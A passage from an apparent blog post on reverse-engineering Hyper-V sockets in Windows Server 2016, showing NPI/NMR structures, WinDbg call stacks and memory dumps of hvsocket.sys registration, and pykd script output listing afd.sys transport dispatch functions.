<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PNPI_PROVIDER_CHARACTERISTICS ProviderCharacteristics,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ProviderContext,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PHANDLE NmrProviderHandle</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="275" src="https://lh6.googleusercontent.com/T24jUa08MVr0G_TNq7Coa6Y_hZB0c3TKvvCmeSAZU84Qm47aKPY-1cpaNU0pwL5T3ris_SI5ff84dU8XVn6j-PVsRofRB4OwYefGbHyqvaT8AcjokjTRTxs71uOHi3u0QmsV6jJxce3Avl1Dog" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="491" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">typedef</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">struct</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _NPI_REGISTRATION_INSTANCE {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> USHORT Version;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> USHORT Size;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PNPIID NpiId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> PNPI_MODULEID ModuleId;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ULONG Number;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">const</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VOID *NpiSpecificCharacteristics;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} NPI_REGISTRATION_INSTANCE, *PNPI_REGISTRATION_INSTANCE;</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">typedef</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">struct</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _NPI_MODULEID {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> USHORT Length;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> NPI_MODULEID_TYPE Type;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">union</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> GUID Guid;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> LUID IfLuid;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> };</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} NPI_MODULEID, *PNPI_MODULEID;</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Registration of hvsocket.sys as provider will look so</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 NETIO!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 hvsocket!HvSocketProviderStart</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!RootDeviceAdd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDriverDeviceAdd::Invoke</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!FxDriver::AddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 nt!PpvUtilCallAddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 nt!PnpCallAddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 nt!PipCallDriverAddDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 nt!PipProcessDevNodeTree</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 nt!PiProcessStartSystemDevices</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!PnpDeviceActionWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dps rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece010 00000000`00480000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece018 fffff806`0ded1640 hvsocket!HvSocketNotifyAttachClient </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- ProviderAttachClient</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece020 fffff806`0ded18c0 hvsocket!HvSocketNotifyDetachClient </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- ProviderDetachClient</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece028 fffff806`0ded19a0 hvsocket!HvSocketNotifyCleanupClientContext </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- ProviderCleanUpBindingContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece030 00000000`00280000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– Begin of NPI_REGISTRATION_INSTANCE (Version+Size)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece038 fffff806`0decc3e0 hvsocket!NPI_TRANSPORT_LAYER_ID – </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pointer to NpiId (GUID NPIID) - dt _GUID poi(rcx+28h)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece040 fffff806`0decc3f0 hvsocket!NPI_MS_VMBUS_MODULEID </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– pointer to ModuleId – dt _GUID poi(rcx+30h)+8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece048 00000000`00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- Number</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece050 fffff806`0decc2e0 hvsocket!VmbusTlProviderCharacteristics - </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NpiSpecificCharacteristics</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece058 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece060 00000500`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece068 0000ef8b`4509d61c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece070 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece078 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece080 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece088 fffff803`6c322884 nt!EtwRegisterClassicProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">NpiId GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {2227e804-8d8b-11d4-abad-009027719e09}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Data1 : 0x2227e804</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x004 Data2 : 0x8d8b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x006 Data3 : 0x11d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Data4 : [8] "???"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NPI_MODULEID_TYPE GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {eb004a27-9b1a-11d4-9123-0050047759bc}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Data1 : 0xeb004a27</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x004 Data2 : 0x9b1a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x006 Data3 : 0x11d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Data4 : [8] "???"</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Logging of registration of NPI clients is similarly carried out. The only thing that breakpoint necessary to be put on netio! NmrRegisterClient. It is interesting that registration of hvsocket.sys as client is not noticed anywhere. The only registered components of virtualization is NDIS! NPI_NDIS_VBUS_INTERFACE_ID (registration goes from NDIS!DriverEntry) and vmswitch!NPI_PKTCAP_INTERFACE_ID (registration from vmswitch!DriverEntry).</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The complete list of the providers and clients registered by Windows Server 2016 is provided on Gihub (https://github.com/gerhart01/HyperV-sockets/blob/master/RegisteredProviders.xlsx) in the following format:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="327" src="https://lh3.googleusercontent.com/0JV3c4hfmwgBKlKnPdG_yYyaim8iUlltxFgKRynEJyamIVgSOM41ki9_22yXLZT70LqaNRRWlsZdcqX3KEA5-3XAMzYbMfx5wJvL6M1HFzYawk6D-lSS7URAuGppq7bx2NL2OiCAQ0Jq6kU3Tw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="543" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016 in default installation in virtual lab registers 54 providers.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In afd.sys there is an function afd!AfdTlNotifyAttachProvider (client module's ClientAttachProvider callback function) which works with structure AfdTlTransportListHead. We can use a small script for pykd which get a part of the address family elements and function of processing of each element:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> !py D:\afd_parse_AfdTlTransportListHead.py</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cs:AfdTlTransportListHead address is 0xffffb089b4579040L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x0 [ AF_UNSPEC ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function tcpip!TcpTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x0 [ AF_UNSPEC ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function tcpip!UdpTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x0 [ AF_UNSPEC ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function tcpip!RawTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x22 [ AF_HYPERV ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function hvsocket!VmbusTlProviderDispatch</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In principle, the afd command of mex extention for WinDBG has to output similar information, but at my stand it for any reason did not work (perhaps, private symbols are necessary).</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At start of vmbusr.sys we see start of hvsocket!HvSocketProviderStart after which afd!AfdTlNotifyAttachProvider is caused. </span></div>
